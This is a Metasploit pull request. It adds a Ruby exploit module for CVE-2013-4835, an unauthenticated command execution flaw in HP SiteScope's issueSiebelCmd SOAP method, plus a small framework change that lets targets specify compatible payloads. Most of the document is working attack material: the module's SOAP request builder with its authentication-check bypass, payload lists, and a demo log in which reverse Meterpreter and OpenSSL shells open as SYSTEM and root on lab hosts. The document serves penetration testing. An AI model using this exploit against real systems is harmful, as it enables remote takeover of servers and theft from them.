### PR TITLE
Add module for ZDI-13-263 and allow Targets to specify compatible payloads

### DIFF
--- a/lib/msf/core/module.rb
+++ b/lib/msf/core/module.rb
@@ -449,6 +449,9 @@ class Module
       ch = self.compat['Nop']
     elsif (mod.type == MODULE_PAYLOAD)
       ch = self.compat['Payload']
+      if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat']
+        ch.merge!(self.target['Payload']['Compat'])
+      end
     else
       return true
     end

--- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
+++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb
@@ -1,0 +1,164 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+
+  include REXML
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStagerVBS
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'HP SiteScope issueSiebelCmd Remote Code Execution',
+      'Description' => %q{
+        This module exploits a code execution flaw in HP SiteScope. The vulnerability exists in the
+        APISiteScopeImpl web service, specifically in the issueSiebelCmd method, which allows the
+        user to execute arbitrary commands without prior authentication. This module has been tested
+        successfully on HP SiteScope 11.20 over Windows 2003 SP2, Windows 2008 and CentOS 6.5.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-4835'],
+          [ 'OSVDB', '99230' ],
+          [ 'BID', '63478' ],
+          [ 'ZDI', '13-263' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => %w{ win unix },
+      'Arch'        => [ ARCH_X86, ARCH_CMD ],
+      'Payload'     =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Targets'     =>
+        [
+          [ 'HP SiteScope 11.20 / Windows',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ],
+          [ 'HP SiteScope 11.20 / Linux',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'Payload' =>
+                {
+                  'BadChars' => "\x20\x22\x27\x3c",
+                  'Compat'      => {
+                    'RequiredCmd' => 'perl python bash-tcp gawk openssl'
+                  }
+                }
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Oct 30 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
+      ], self.class)
+  end
+
+  def check
+    value = rand_text_alpha(8 + rand(10))
+
+    res = send_soap_request(value)
+
+    if res and res.code == 500 and res.body.to_s =~ /Cmd Error: User and Password must be specified/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    if target.name =~ /Windows/
+      print_status("#{peer} - Delivering payload...")
+      # cmd.exe max length is 8192
+      execute_cmdstager({:linemax => 8000, :nodelete => true})
+    elsif target.name =~ /Linux/
+      print_status("#{peer} - Executing payload...")
+      execute_command(payload.encoded, {:http_timeout => 1})
+    end
+  end
+
+  def execute_command(cmd, opts={})
+    if target.name =~ /Windows/
+      cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
+      command = "cmd.exe /c "
+      command << cmd.gsub(/&/, "&#x26;")   # HTML Encode '&' character to avoid soap request parsing errors
+      command << " &#x26; /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing
+    elsif target.name =~ /Linux/
+      command = "sh -c "
+      command << cmd.gsub(/&/, "&#x26;")   # HTML Encode '&' character to avoid soap request parsing errors
+      command << " /u #{rand_text_alpha(4)} /p #{rand_text_alpha(4)}" # To bypass user and pass flags check before executing
+    end
+
+    res = send_soap_request(command, opts[:http_timeout] || 20)
+
+    return if target.name =~ /Linux/ # There isn't response with some ARCH_CMD payloads
+
+    unless res and res.code == 500 and res.body =~ /SiteScope encountered an error associated with running a command/
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response, aborting...")
+    end
+  end
+
+  def get_soap_request
+    xml = Document.new
+    xml.add_element(
+        "soapenv:Envelope",
+        {
+            'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
+            'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
+            'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+            'xmlns:api'     => "http://Api.freshtech.COM"
+        })
+    xml.root.add_element("soapenv:Header")
+    xml.root.add_element("soapenv:Body")
+    body = xml.root.elements[2]
+    body.add_element(
+        "api:issueSiebelCmd",
+        {
+            'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
+        })
+    ser = body.elements[1]
+    ser.add_element("in0", {'xsi:type' => 'xsd:string'})
+    ser.elements['in0'].text = "MSF_COMMAND"
+
+    xml.to_s
+  end
+
+  def send_soap_request(command, timeout = 20)
+    res = send_request_cgi({
+      'uri'      => normalize_uri(target_uri.path, 'services', 'APISiteScopeImpl'),
+      'method'   => 'POST',
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'data'     => get_soap_request.gsub(/MSF_COMMAND/, command), # To avoid rexml html encoding
+      'headers'  => {
+        'SOAPAction' => '""'
+      }
+    }, timeout)
+
+    return res
+  end
+
+end


### PR DESCRIPTION
This pull request adds two things:
- Allows to specify "Compat" options on the "Payload" section of every target.
- Adds a module for ZDI-13-263, which benefits from the anterior point
# Verification
## "Compat" options available on the "Payload" section of every target
- [ ] Use the exploit/multi/http/hp_sitescope_issuesiebelcmd module added in this pr
- [ ] set target 0 (windows)
- [ ] set PAYLOAD [tab] [tab]
- [ ] Verify which the compatible windows native payloads are available

```
msf exploit(hp_sitescope_issuesiebelcmd) > set target 0
target => 0
msf exploit(hp_sitescope_issuesiebelcmd) > set payload 
Display all 114 possibilities? (y or n)
set payload generic/custom                                   set payload windows/patchupmeterpreter/bind_nonx_tcp
set payload generic/debug_trap                               set payload windows/patchupmeterpreter/bind_tcp
set payload generic/shell_bind_tcp                           set payload windows/patchupmeterpreter/bind_tcp_rc4
set payload generic/shell_reverse_tcp                        set payload windows/patchupmeterpreter/reverse_ipv6_tcp
set payload generic/tight_loop                               set payload windows/patchupmeterpreter/reverse_nonx_tcp
set payload windows/adduser                                  set payload windows/patchupmeterpreter/reverse_ord_tcp
set payload windows/dllinject/bind_ipv6_tcp                  set payload windows/patchupmeterpreter/reverse_tcp
set payload windows/dllinject/bind_nonx_tcp                  set payload windows/patchupmeterpreter/reverse_tcp_allports
set payload windows/dllinject/bind_tcp                       set payload windows/patchupmeterpreter/reverse_tcp_dns
set payload windows/dllinject/bind_tcp_rc4                   set payload windows/patchupmeterpreter/reverse_tcp_rc4
set payload windows/dllinject/reverse_http                   set payload windows/patchupmeterpreter/reverse_tcp_rc4_dns
set payload windows/dllinject/reverse_ipv6_http              set payload windows/shell/bind_ipv6_tcp
set payload windows/dllinject/reverse_ipv6_tcp               set payload windows/shell/bind_nonx_tcp
set payload windows/dllinject/reverse_nonx_tcp               set payload windows/shell/bind_tcp
set payload windows/dllinject/reverse_ord_tcp                set payload windows/shell/bind_tcp_rc4
set payload windows/dllinject/reverse_tcp                    set payload windows/shell/reverse_http
set payload windows/dllinject/reverse_tcp_allports           set payload windows/shell/reverse_ipv6_http
set payload windows/dllinject/reverse_tcp_dns                set payload windows/shell/reverse_ipv6_tcp
set payload windows/dllinject/reverse_tcp_rc4                set payload windows/shell/reverse_nonx_tcp
set payload windows/dllinject/reverse_tcp_rc4_dns            set payload windows/shell/reverse_ord_tcp
set payload windows/dns_txt_query_exec                       set payload windows/shell/reverse_tcp
set payload windows/download_exec                            set payload windows/shell/reverse_tcp_allports
set payload windows/exec                                     set payload windows/shell/reverse_tcp_dns
set payload windows/loadlibrary                              set payload windows/shell/reverse_tcp_rc4
set payload windows/messagebox                               set payload windows/shell/reverse_tcp_rc4_dns
set payload windows/meterpreter/bind_ipv6_tcp                set payload windows/shell_bind_tcp
set payload windows/meterpreter/bind_nonx_tcp                set payload windows/shell_bind_tcp_xpfw
set payload windows/meterpreter/bind_tcp                     set payload windows/shell_reverse_tcp
set payload windows/meterpreter/bind_tcp_rc4                 set payload windows/speak_pwned
set payload windows/meterpreter/reverse_http                 set payload windows/upexec/bind_ipv6_tcp
set payload windows/meterpreter/reverse_https                set payload windows/upexec/bind_nonx_tcp
set payload windows/meterpreter/reverse_https_proxy          set payload windows/upexec/bind_tcp
set payload windows/meterpreter/reverse_ipv6_http            set payload windows/upexec/bind_tcp_rc4
set payload windows/meterpreter/reverse_ipv6_https           set payload windows/upexec/reverse_http
set payload windows/meterpreter/reverse_ipv6_tcp             set payload windows/upexec/reverse_ipv6_http
set payload windows/meterpreter/reverse_nonx_tcp             set payload windows/upexec/reverse_ipv6_tcp
set payload windows/meterpreter/reverse_ord_tcp              set payload windows/upexec/reverse_nonx_tcp
set payload windows/meterpreter/reverse_tcp                  set payload windows/upexec/reverse_ord_tcp
set payload windows/meterpreter/reverse_tcp_allports         set payload windows/upexec/reverse_tcp
set payload windows/meterpreter/reverse_tcp_dns              set payload windows/upexec/reverse_tcp_allports
set payload windows/meterpreter/reverse_tcp_rc4              set payload windows/upexec/reverse_tcp_dns
set payload windows/meterpreter/reverse_tcp_rc4_dns          set payload windows/upexec/reverse_tcp_rc4
set payload windows/metsvc_bind_tcp                          set payload windows/upexec/reverse_tcp_rc4_dns
set payload windows/metsvc_reverse_tcp                       set payload windows/vncinject/bind_ipv6_tcp
set payload windows/patchupdllinject/bind_ipv6_tcp           set payload windows/vncinject/bind_nonx_tcp
set payload windows/patchupdllinject/bind_nonx_tcp           set payload windows/vncinject/bind_tcp
set payload windows/patchupdllinject/bind_tcp                set payload windows/vncinject/bind_tcp_rc4
set payload windows/patchupdllinject/bind_tcp_rc4            set payload windows/vncinject/reverse_http
--More--
```
- [ ] set target 1 (Linux)
- [ ] set PAYLOAD [tab] [tab]
- [ ] Verify which ONLY the compatible UNIX CMD payloads are available

```
msf exploit(hp_sitescope_issuesiebelcmd) > set target 1
target => 1
msf exploit(hp_sitescope_issuesiebelcmd) > set payload cmd/unix/
set payload cmd/unix/bind_awk                 set payload cmd/unix/reverse_bash             set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/bind_perl                set payload cmd/unix/reverse_bash_telnet_ssl  set payload cmd/unix/reverse_python
set payload cmd/unix/bind_perl_ipv6           set payload cmd/unix/reverse_openssl          set payload cmd/unix/reverse_python_ssl
set payload cmd/unix/reverse_awk              set payload cmd/unix/reverse_perl             
```
## ZDI-13-263
- [ ] Install a supported SO. I've tested: WIN2003 SP2 (32 bits), WIN2008 (64 bits), CentOS 6.5 (64 bits).
- [ ] Install HP SiteScope 11.20. I downloaded the trial from here http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html but looks like the 11.20 version isn't available anymore, so ask for me for an installer if you need it for testing purposes. I can also share pcap's if needed.
- [ ] Use the module like in the demo, hopefully enjoy session on both windows and linux systems.
- DEMO

```
msf > use exploit/multi/http/hp_sitescope_issuesiebelcmd 
msf exploit(hp_sitescope_issuesiebelcmd) > show options

Module options (exploit/multi/http/hp_sitescope_issuesiebelcmd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /SiteScope/      yes       Path to SiteScope
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   HP SiteScope 11.20 / Windows


msf exploit(hp_sitescope_issuesiebelcmd) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hp_sitescope_issuesiebelcmd) > set rhost 192.168.172.135
rhost => 192.168.172.135
msf exploit(hp_sitescope_issuesiebelcmd) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(hp_sitescope_issuesiebelcmd) > check
[*] The target appears to be vulnerable.
msf exploit(hp_sitescope_issuesiebelcmd) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.135:8080 - Delivering payload...
[*] Command Stager progress -   7.92% done (7999/101010 bytes)
[*] Command Stager progress -  15.84% done (15998/101010 bytes)
[*] Command Stager progress -  23.76% done (23997/101010 bytes)
[*] Command Stager progress -  31.68% done (31996/101010 bytes)
[*] Command Stager progress -  39.60% done (39995/101010 bytes)
[*] Command Stager progress -  47.51% done (47994/101010 bytes)
[*] Command Stager progress -  55.43% done (55993/101010 bytes)
[*] Command Stager progress -  63.35% done (63992/101010 bytes)
[*] Command Stager progress -  71.27% done (71991/101010 bytes)
[*] Command Stager progress -  79.19% done (79990/101010 bytes)
[*] Command Stager progress -  87.11% done (87989/101010 bytes)
[*] Command Stager progress -  95.03% done (95988/101010 bytes)
[*] Sending stage (769024 bytes) to 192.168.172.135
[*] Command Stager progress - 100.01% done (101016/101010 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.135:49168) at 2013-12-19 17:26:50 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-3AHUT1VVMBT
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(hp_sitescope_issuesiebelcmd) > set target 1
target => 1
msf exploit(hp_sitescope_issuesiebelcmd) > set payload cmd/unix/reverse_openssl 
payload => cmd/unix/reverse_openssl
msf exploit(hp_sitescope_issuesiebelcmd) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] 192.168.172.133:8080 - Executing payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ob6LiO9g8fLP1iMZ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "ob6LiO9g8fLP1iMZ\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.133:59611) at 2013-12-19 17:45:34 -0600

getuid
sh: line 2: getuid: command not found
id 
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

```
